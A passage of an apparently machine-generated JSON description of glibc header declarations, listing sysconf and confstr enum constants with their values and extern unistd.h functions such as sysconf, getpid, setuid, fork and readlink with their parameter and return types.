"field", "name": "_SC_SELECT", "value": 59 }, { "tag": "field", "name": "_SC_UIO_MAXIOV", "value": 60 }, { "tag": "field", "name": "_SC_IOV_MAX", "value": 60 }, { "tag": "field", "name": "_SC_PII_INTERNET_STREAM", "value": 61 }, { "tag": "field", "name": "_SC_PII_INTERNET_DGRAM", "value": 62 }, { "tag": "field", "name": "_SC_PII_OSI_COTS", "value": 63 }, { "tag": "field", "name": "_SC_PII_OSI_CLTS", "value": 64 }, { "tag": "field", "name": "_SC_PII_OSI_M", "value": 65 }, { "tag": "field", "name": "_SC_T_IOV_MAX", "value": 66 }, { "tag": "field", "name": "_SC_THREADS", "value": 67 }, { "tag": "field", "name": "_SC_THREAD_SAFE_FUNCTIONS", "value": 68 }, { "tag": "field", "name": "_SC_GETGR_R_SIZE_MAX", "value": 69 }, { "tag": "field", "name": "_SC_GETPW_R_SIZE_MAX", "value": 70 }, { "tag": "field", "name": "_SC_LOGIN_NAME_MAX", "value": 71 }, { "tag": "field", "name": "_SC_TTY_NAME_MAX", "value": 72 }, { "tag": "field", "name": "_SC_THREAD_DESTRUCTOR_ITERATIONS", "value": 73 }, { "tag": "field", "name": "_SC_THREAD_KEYS_MAX", "value": 74 }, { "tag": "field", "name": "_SC_THREAD_STACK_MIN", "value": 75 }, { "tag": "field", "name": "_SC_THREAD_THREADS_MAX", "value": 76 }, { "tag": "field", "name": "_SC_THREAD_ATTR_STACKADDR", "value": 77 }, { "tag": "field", "name": "_SC_THREAD_ATTR_STACKSIZE", "value": 78 }, { "tag": "field", "name": "_SC_THREAD_PRIORITY_SCHEDULING", "value": 79 }, { "tag": "field", "name": "_SC_THREAD_PRIO_INHERIT", "value": 80 }, { "tag": "field", "name": "_SC_THREAD_PRIO_PROTECT", "value": 81 }, { "tag": "field", "name": "_SC_THREAD_PROCESS_SHARED", "value": 82 }, { "tag": "field", "name": "_SC_NPROCESSORS_CONF", "value": 83 }, { "tag": "field", "name": "_SC_NPROCESSORS_ONLN", "value": 84 }, { "tag": "field", "name": "_SC_PHYS_PAGES", "value": 85 }, { "tag": "field", "name": "_SC_AVPHYS_PAGES", "value": 86 }, { "tag": "field", "name": "_SC_ATEXIT_MAX", "value": 87 }, { "tag": "field", "name": "_SC_PASS_MAX", "value": 88 }, { "tag": "field", "name": "_SC_XOPEN_VERSION", "value": 89 }, { "tag": "field", "name": "_SC_XOPEN_XCU_VERSION", "value": 90 }, { "tag": "field", "name": "_SC_XOPEN_UNIX", "value": 91 }, { "tag": "field", "name": "_SC_XOPEN_CRYPT", "value": 92 }, { "tag": "field", "name": "_SC_XOPEN_ENH_I18N", "value": 93 }, { "tag": "field", "name": "_SC_XOPEN_SHM", "value": 94 }, { "tag": "field", "name": "_SC_2_CHAR_TERM", "value": 95 }, { "tag": "field", "name": "_SC_2_C_VERSION", "value": 96 }, { "tag": "field", "name": "_SC_2_UPE", "value": 97 }, { "tag": "field", "name": "_SC_XOPEN_XPG2", "value": 98 }, { "tag": "field", "name": "_SC_XOPEN_XPG3", "value": 99 }, { "tag": "field", "name": "_SC_XOPEN_XPG4", "value": 100 }, { "tag": "field", "name": "_SC_CHAR_BIT", "value": 101 }, { "tag": "field", "name": "_SC_CHAR_MAX", "value": 102 }, { "tag": "field", "name": "_SC_CHAR_MIN", "value": 103 }, { "tag": "field", "name": "_SC_INT_MAX", "value": 104 }, { "tag": "field", "name": "_SC_INT_MIN", "value": 105 }, { "tag": "field", "name": "_SC_LONG_BIT", "value": 106 }, { "tag": "field", "name": "_SC_WORD_BIT", "value": 107 }, { "tag": "field", "name": "_SC_MB_LEN_MAX", "value": 108 }, { "tag": "field", "name": "_SC_NZERO", "value": 109 }, { "tag": "field", "name": "_SC_SSIZE_MAX", "value": 110 }, { "tag": "field", "name": "_SC_SCHAR_MAX", "value": 111 }, { "tag": "field", "name": "_SC_SCHAR_MIN", "value": 112 }, { "tag": "field", "name": "_SC_SHRT_MAX", "value": 113 }, { "tag": "field", "name": "_SC_SHRT_MIN", "value": 114 }, { "tag": "field", "name": "_SC_UCHAR_MAX", "value": 115 }, { "tag": "field", "name": "_SC_UINT_MAX", "value": 116 }, { "tag": "field", "name": "_SC_ULONG_MAX", "value": 117 }, { "tag": "field", "name": "_SC_USHRT_MAX", "value": 118 }, { "tag": "field", "name": "_SC_NL_ARGMAX", "value": 119 }, { "tag": "field", "name": "_SC_NL_LANGMAX", "value": 120 }, { "tag": "field", "name": "_SC_NL_MSGMAX", "value": 121 }, { "tag": "field", "name": "_SC_NL_NMAX", "value": 122 }, { "tag": "field", "name": "_SC_NL_SETMAX", "value": 123 }, { "tag": "field", "name": "_SC_NL_TEXTMAX", "value": 124 }, { "tag": "field", "name": "_SC_XBS5_ILP32_OFF32", "value": 125 }, { "tag": "field", "name": "_SC_XBS5_ILP32_OFFBIG", "value": 126 }, { "tag": "field", "name": "_SC_XBS5_LP64_OFF64", "value": 127 }, { "tag": "field", "name": "_SC_XBS5_LPBIG_OFFBIG", "value": 128 }, { "tag": "field", "name": "_SC_XOPEN_LEGACY", "value": 129 }, { "tag": "field", "name": "_SC_XOPEN_REALTIME", "value": 130 }, { "tag": "field", "name": "_SC_XOPEN_REALTIME_THREADS", "value": 131 }, { "tag": "field", "name": "_SC_ADVISORY_INFO", "value": 132 }, { "tag": "field", "name": "_SC_BARRIERS", "value": 133 }, { "tag": "field", "name": "_SC_BASE", "value": 134 }, { "tag": "field", "name": "_SC_C_LANG_SUPPORT", "value": 135 }, { "tag": "field", "name": "_SC_C_LANG_SUPPORT_R", "value": 136 }, { "tag": "field", "name": "_SC_CLOCK_SELECTION", "value": 137 }, { "tag": "field", "name": "_SC_CPUTIME", "value": 138 }, { "tag": "field", "name": "_SC_THREAD_CPUTIME", "value": 139 }, { "tag": "field", "name": "_SC_DEVICE_IO", "value": 140 }, { "tag": "field", "name": "_SC_DEVICE_SPECIFIC", "value": 141 }, { "tag": "field", "name": "_SC_DEVICE_SPECIFIC_R", "value": 142 }, { "tag": "field", "name": "_SC_FD_MGMT", "value": 143 }, { "tag": "field", "name": "_SC_FIFO", "value": 144 }, { "tag": "field", "name": "_SC_PIPE", "value": 145 }, { "tag": "field", "name": "_SC_FILE_ATTRIBUTES", "value": 146 }, { "tag": "field", "name": "_SC_FILE_LOCKING", "value": 147 }, { "tag": "field", "name": "_SC_FILE_SYSTEM", "value": 148 }, { "tag": "field", "name": "_SC_MONOTONIC_CLOCK", "value": 149 }, { "tag": "field", "name": "_SC_MULTI_PROCESS", "value": 150 }, { "tag": "field", "name": "_SC_SINGLE_PROCESS", "value": 151 }, { "tag": "field", "name": "_SC_NETWORKING", "value": 152 }, { "tag": "field", "name": "_SC_READER_WRITER_LOCKS", "value": 153 }, { "tag": "field", "name": "_SC_SPIN_LOCKS", "value": 154 }, { "tag": "field", "name": "_SC_REGEXP", "value": 155 }, { "tag": "field", "name": "_SC_REGEX_VERSION", "value": 156 }, { "tag": "field", "name": "_SC_SHELL", "value": 157 }, { "tag": "field", "name": "_SC_SIGNALS", "value": 158 }, { "tag": "field", "name": "_SC_SPAWN", "value": 159 }, { "tag": "field", "name": "_SC_SPORADIC_SERVER", "value": 160 }, { "tag": "field", "name": "_SC_THREAD_SPORADIC_SERVER", "value": 161 }, { "tag": "field", "name": "_SC_SYSTEM_DATABASE", "value": 162 }, { "tag": "field", "name": "_SC_SYSTEM_DATABASE_R", "value": 163 }, { "tag": "field", "name": "_SC_TIMEOUTS", "value": 164 }, { "tag": "field", "name": "_SC_TYPED_MEMORY_OBJECTS", "value": 165 }, { "tag": "field", "name": "_SC_USER_GROUPS", "value": 166 }, { "tag": "field", "name": "_SC_USER_GROUPS_R", "value": 167 }, { "tag": "field", "name": "_SC_2_PBS", "value": 168 }, { "tag": "field", "name": "_SC_2_PBS_ACCOUNTING", "value": 169 }, { "tag": "field", "name": "_SC_2_PBS_LOCATE", "value": 170 }, { "tag": "field", "name": "_SC_2_PBS_MESSAGE", "value": 171 }, { "tag": "field", "name": "_SC_2_PBS_TRACK", "value": 172 }, { "tag": "field", "name": "_SC_SYMLOOP_MAX", "value": 173 }, { "tag": "field", "name": "_SC_STREAMS", "value": 174 }, { "tag": "field", "name": "_SC_2_PBS_CHECKPOINT", "value": 175 }, { "tag": "field", "name": "_SC_V6_ILP32_OFF32", "value": 176 }, { "tag": "field", "name": "_SC_V6_ILP32_OFFBIG", "value": 177 }, { "tag": "field", "name": "_SC_V6_LP64_OFF64", "value": 178 }, { "tag": "field", "name": "_SC_V6_LPBIG_OFFBIG", "value": 179 }, { "tag": "field", "name": "_SC_HOST_NAME_MAX", "value": 180 }, { "tag": "field", "name": "_SC_TRACE", "value": 181 }, { "tag": "field", "name": "_SC_TRACE_EVENT_FILTER", "value": 182 }, { "tag": "field", "name": "_SC_TRACE_INHERIT", "value": 183 }, { "tag": "field", "name": "_SC_TRACE_LOG", "value": 184 }, { "tag": "field", "name": "_SC_LEVEL1_ICACHE_SIZE", "value": 185 }, { "tag": "field", "name": "_SC_LEVEL1_ICACHE_ASSOC", "value": 186 }, { "tag": "field", "name": "_SC_LEVEL1_ICACHE_LINESIZE", "value": 187 }, { "tag": "field", "name": "_SC_LEVEL1_DCACHE_SIZE", "value": 188 }, { "tag": "field", "name": "_SC_LEVEL1_DCACHE_ASSOC", "value": 189 }, { "tag": "field", "name": "_SC_LEVEL1_DCACHE_LINESIZE", "value": 190 }, { "tag": "field", "name": "_SC_LEVEL2_CACHE_SIZE", "value": 191 }, { "tag": "field", "name": "_SC_LEVEL2_CACHE_ASSOC", "value": 192 }, { "tag": "field", "name": "_SC_LEVEL2_CACHE_LINESIZE", "value": 193 }, { "tag": "field", "name": "_SC_LEVEL3_CACHE_SIZE", "value": 194 }, { "tag": "field", "name": "_SC_LEVEL3_CACHE_ASSOC", "value": 195 }, { "tag": "field", "name": "_SC_LEVEL3_CACHE_LINESIZE", "value": 196 }, { "tag": "field", "name": "_SC_LEVEL4_CACHE_SIZE", "value": 197 }, { "tag": "field", "name": "_SC_LEVEL4_CACHE_ASSOC", "value": 198 }, { "tag": "field", "name": "_SC_LEVEL4_CACHE_LINESIZE", "value": 199 }, { "tag": "field", "name": "_SC_IPV6", "value": 235 }, { "tag": "field", "name": "_SC_RAW_SOCKETS", "value": 236 }, { "tag": "field", "name": "_SC_V7_ILP32_OFF32", "value": 237 }, { "tag": "field", "name": "_SC_V7_ILP32_OFFBIG", "value": 238 }, { "tag": "field", "name": "_SC_V7_LP64_OFF64", "value": 239 }, { "tag": "field", "name": "_SC_V7_LPBIG_OFFBIG", "value": 240 }, { "tag": "field", "name": "_SC_SS_REPL_MAX", "value": 241 }, { "tag": "field", "name": "_SC_TRACE_EVENT_NAME_MAX", "value": 242 }, { "tag": "field", "name": "_SC_TRACE_NAME_MAX", "value": 243 }, { "tag": "field", "name": "_SC_TRACE_SYS_MAX", "value": 244 }, { "tag": "field", "name": "_SC_TRACE_USER_EVENT_MAX", "value": 245 }, { "tag": "field", "name": "_SC_XOPEN_STREAMS", "value": 246 }, { "tag": "field", "name": "_SC_THREAD_ROBUST_PRIO_INHERIT", "value": 247 }, { "tag": "field", "name": "_SC_THREAD_ROBUST_PRIO_PROTECT", "value": 248 }] }, { "tag": "enum", "ns": 0, "name": "", "id": 54, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:533:1", "fields": [{ "tag": "field", "name": "_CS_PATH", "value": 0 }, { "tag": "field", "name": "_CS_V6_WIDTH_RESTRICTED_ENVS", "value": 1 }, { "tag": "field", "name": "_CS_GNU_LIBC_VERSION", "value": 2 }, { "tag": "field", "name": "_CS_GNU_LIBPTHREAD_VERSION", "value": 3 }, { "tag": "field", "name": "_CS_V5_WIDTH_RESTRICTED_ENVS", "value": 4 }, { "tag": "field", "name": "_CS_V7_WIDTH_RESTRICTED_ENVS", "value": 5 }, { "tag": "field", "name": "_CS_LFS_CFLAGS", "value": 1000 }, { "tag": "field", "name": "_CS_LFS_LDFLAGS", "value": 1001 }, { "tag": "field", "name": "_CS_LFS_LIBS", "value": 1002 }, { "tag": "field", "name": "_CS_LFS_LINTFLAGS", "value": 1003 }, { "tag": "field", "name": "_CS_LFS64_CFLAGS", "value": 1004 }, { "tag": "field", "name": "_CS_LFS64_LDFLAGS", "value": 1005 }, { "tag": "field", "name": "_CS_LFS64_LIBS", "value": 1006 }, { "tag": "field", "name": "_CS_LFS64_LINTFLAGS", "value": 1007 }, { "tag": "field", "name": "_CS_XBS5_ILP32_OFF32_CFLAGS", "value": 1100 }, { "tag": "field", "name": "_CS_XBS5_ILP32_OFF32_LDFLAGS", "value": 1101 }, { "tag": "field", "name": "_CS_XBS5_ILP32_OFF32_LIBS", "value": 1102 }, { "tag": "field", "name": "_CS_XBS5_ILP32_OFF32_LINTFLAGS", "value": 1103 }, { "tag": "field", "name": "_CS_XBS5_ILP32_OFFBIG_CFLAGS", "value": 1104 }, { "tag": "field", "name": "_CS_XBS5_ILP32_OFFBIG_LDFLAGS", "value": 1105 }, { "tag": "field", "name": "_CS_XBS5_ILP32_OFFBIG_LIBS", "value": 1106 }, { "tag": "field", "name": "_CS_XBS5_ILP32_OFFBIG_LINTFLAGS", "value": 1107 }, { "tag": "field", "name": "_CS_XBS5_LP64_OFF64_CFLAGS", "value": 1108 }, { "tag": "field", "name": "_CS_XBS5_LP64_OFF64_LDFLAGS", "value": 1109 }, { "tag": "field", "name": "_CS_XBS5_LP64_OFF64_LIBS", "value": 1110 }, { "tag": "field", "name": "_CS_XBS5_LP64_OFF64_LINTFLAGS", "value": 1111 }, { "tag": "field", "name": "_CS_XBS5_LPBIG_OFFBIG_CFLAGS", "value": 1112 }, { "tag": "field", "name": "_CS_XBS5_LPBIG_OFFBIG_LDFLAGS", "value": 1113 }, { "tag": "field", "name": "_CS_XBS5_LPBIG_OFFBIG_LIBS", "value": 1114 }, { "tag": "field", "name": "_CS_XBS5_LPBIG_OFFBIG_LINTFLAGS", "value": 1115 }, { "tag": "field", "name": "_CS_POSIX_V6_ILP32_OFF32_CFLAGS", "value": 1116 }, { "tag": "field", "name": "_CS_POSIX_V6_ILP32_OFF32_LDFLAGS", "value": 1117 }, { "tag": "field", "name": "_CS_POSIX_V6_ILP32_OFF32_LIBS", "value": 1118 }, { "tag": "field", "name": "_CS_POSIX_V6_ILP32_OFF32_LINTFLAGS", "value": 1119 }, { "tag": "field", "name": "_CS_POSIX_V6_ILP32_OFFBIG_CFLAGS", "value": 1120 }, { "tag": "field", "name": "_CS_POSIX_V6_ILP32_OFFBIG_LDFLAGS", "value": 1121 }, { "tag": "field", "name": "_CS_POSIX_V6_ILP32_OFFBIG_LIBS", "value": 1122 }, { "tag": "field", "name": "_CS_POSIX_V6_ILP32_OFFBIG_LINTFLAGS", "value": 1123 }, { "tag": "field", "name": "_CS_POSIX_V6_LP64_OFF64_CFLAGS", "value": 1124 }, { "tag": "field", "name": "_CS_POSIX_V6_LP64_OFF64_LDFLAGS", "value": 1125 }, { "tag": "field", "name": "_CS_POSIX_V6_LP64_OFF64_LIBS", "value": 1126 }, { "tag": "field", "name": "_CS_POSIX_V6_LP64_OFF64_LINTFLAGS", "value": 1127 }, { "tag": "field", "name": "_CS_POSIX_V6_LPBIG_OFFBIG_CFLAGS", "value": 1128 }, { "tag": "field", "name": "_CS_POSIX_V6_LPBIG_OFFBIG_LDFLAGS", "value": 1129 }, { "tag": "field", "name": "_CS_POSIX_V6_LPBIG_OFFBIG_LIBS", "value": 1130 }, { "tag": "field", "name": "_CS_POSIX_V6_LPBIG_OFFBIG_LINTFLAGS", "value": 1131 }, { "tag": "field", "name": "_CS_POSIX_V7_ILP32_OFF32_CFLAGS", "value": 1132 }, { "tag": "field", "name": "_CS_POSIX_V7_ILP32_OFF32_LDFLAGS", "value": 1133 }, { "tag": "field", "name": "_CS_POSIX_V7_ILP32_OFF32_LIBS", "value": 1134 }, { "tag": "field", "name": "_CS_POSIX_V7_ILP32_OFF32_LINTFLAGS", "value": 1135 }, { "tag": "field", "name": "_CS_POSIX_V7_ILP32_OFFBIG_CFLAGS", "value": 1136 }, { "tag": "field", "name": "_CS_POSIX_V7_ILP32_OFFBIG_LDFLAGS", "value": 1137 }, { "tag": "field", "name": "_CS_POSIX_V7_ILP32_OFFBIG_LIBS", "value": 1138 }, { "tag": "field", "name": "_CS_POSIX_V7_ILP32_OFFBIG_LINTFLAGS", "value": 1139 }, { "tag": "field", "name": "_CS_POSIX_V7_LP64_OFF64_CFLAGS", "value": 1140 }, { "tag": "field", "name": "_CS_POSIX_V7_LP64_OFF64_LDFLAGS", "value": 1141 }, { "tag": "field", "name": "_CS_POSIX_V7_LP64_OFF64_LIBS", "value": 1142 }, { "tag": "field", "name": "_CS_POSIX_V7_LP64_OFF64_LINTFLAGS", "value": 1143 }, { "tag": "field", "name": "_CS_POSIX_V7_LPBIG_OFFBIG_CFLAGS", "value": 1144 }, { "tag": "field", "name": "_CS_POSIX_V7_LPBIG_OFFBIG_LDFLAGS", "value": 1145 }, { "tag": "field", "name": "_CS_POSIX_V7_LPBIG_OFFBIG_LIBS", "value": 1146 }, { "tag": "field", "name": "_CS_POSIX_V7_LPBIG_OFFBIG_LINTFLAGS", "value": 1147 }, { "tag": "field", "name": "_CS_V6_ENV", "value": 1148 }, { "tag": "field", "name": "_CS_V7_ENV", "value": 1149 }] }, { "tag": "function", "name": "pathconf", "ns": 0, "location": "/usr/include/unistd.h:612:17", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__path", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__name", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "fpathconf", "ns": 0, "location": "/usr/include/unistd.h:616:17", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__name", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "sysconf", "ns": 0, "location": "/usr/include/unistd.h:619:17", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__name", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "confstr", "ns": 0, "location": "/usr/include/unistd.h:623:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__name", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__len", "type": { "tag": "size_t" } }], "return-type": { "tag": "size_t" } }, { "tag": "function", "name": "getpid", "ns": 0, "location": "/usr/include/unistd.h:628:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": "__pid_t" } }, { "tag": "function", "name": "getppid", "ns": 0, "location": "/usr/include/unistd.h:631:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": "__pid_t" } }, { "tag": "function", "name": "getpgrp", "ns": 0, "location": "/usr/include/unistd.h:634:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": "__pid_t" } }, { "tag": "function", "name": "__getpgid", "ns": 0, "location": "/usr/include/unistd.h:637:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__pid", "type": { "tag": "__pid_t" } }], "return-type": { "tag": "__pid_t" } }, { "tag": "function", "name": "getpgid", "ns": 0, "location": "/usr/include/unistd.h:639:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__pid", "type": { "tag": "__pid_t" } }], "return-type": { "tag": "__pid_t" } }, { "tag": "function", "name": "setpgid", "ns": 0, "location": "/usr/include/unistd.h:646:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__pid", "type": { "tag": "__pid_t" } }, { "tag": "parameter", "name": "__pgid", "type": { "tag": "__pid_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "setpgrp", "ns": 0, "location": "/usr/include/unistd.h:660:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "setsid", "ns": 0, "location": "/usr/include/unistd.h:667:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": "__pid_t" } }, { "tag": "function", "name": "getsid", "ns": 0, "location": "/usr/include/unistd.h:671:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__pid", "type": { "tag": "__pid_t" } }], "return-type": { "tag": "__pid_t" } }, { "tag": "function", "name": "getuid", "ns": 0, "location": "/usr/include/unistd.h:675:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": "__uid_t" } }, { "tag": "function", "name": "geteuid", "ns": 0, "location": "/usr/include/unistd.h:678:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": "__uid_t" } }, { "tag": "function", "name": "getgid", "ns": 0, "location": "/usr/include/unistd.h:681:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": "__gid_t" } }, { "tag": "function", "name": "getegid", "ns": 0, "location": "/usr/include/unistd.h:684:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": "__gid_t" } }, { "tag": "function", "name": "getgroups", "ns": 0, "location": "/usr/include/unistd.h:689:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__size", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__list", "type": { "tag": ":pointer", "type": { "tag": "__gid_t" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "setuid", "ns": 0, "location": "/usr/include/unistd.h:700:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__uid", "type": { "tag": "__uid_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "setreuid", "ns": 0, "location": "/usr/include/unistd.h:705:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__ruid", "type": { "tag": "__uid_t" } }, { "tag": "parameter", "name": "__euid", "type": { "tag": "__uid_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "seteuid", "ns": 0, "location": "/usr/include/unistd.h:710:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__uid", "type": { "tag": "__uid_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "setgid", "ns": 0, "location": "/usr/include/unistd.h:717:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__gid", "type": { "tag": "__gid_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "setregid", "ns": 0, "location": "/usr/include/unistd.h:722:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__rgid", "type": { "tag": "__gid_t" } }, { "tag": "parameter", "name": "__egid", "type": { "tag": "__gid_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "setegid", "ns": 0, "location": "/usr/include/unistd.h:727:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__gid", "type": { "tag": "__gid_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fork", "ns": 0, "location": "/usr/include/unistd.h:756:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": "__pid_t" } }, { "tag": "function", "name": "vfork", "ns": 0, "location": "/usr/include/unistd.h:764:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": "__pid_t" } }, { "tag": "function", "name": "ttyname", "ns": 0, "location": "/usr/include/unistd.h:770:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "ttyname_r", "ns": 0, "location": "/usr/include/unistd.h:774:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__buflen", "type": { "tag": "size_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "isatty", "ns": 0, "location": "/usr/include/unistd.h:779:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "ttyslot", "ns": 0, "location": "/usr/include/unistd.h:784:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "link", "ns": 0, "location": "/usr/include/unistd.h:789:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__from", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__to", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "linkat", "ns": 0, "location": "/usr/include/unistd.h:795:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fromfd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__from", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__tofd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__to", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__flags", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "symlink", "ns": 0, "location": "/usr/include/unistd.h:802:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__from", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__to", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "readlink", "ns": 0, "location": "/usr/include/unistd.h:808:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__path", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__len", "type": { "tag": "size_t" } }], "return-type": { "tag": "ssize_t" } }, { "tag": "function", "name": "symlinkat", "ns": 0, "location": "/usr/include/unistd.h:815:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__from", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__tofd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__to", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "readlinkat", "ns": 0, "location": "/usr/include/unistd.h:819:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__path", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__len", "type": { "tag": "size_t" } }], "return-type": { "tag": "ssize_t" } }, { "tag": "function", "name": "unlink", "ns": 0, "location": "/usr/include/unistd.h:825:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__name", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, 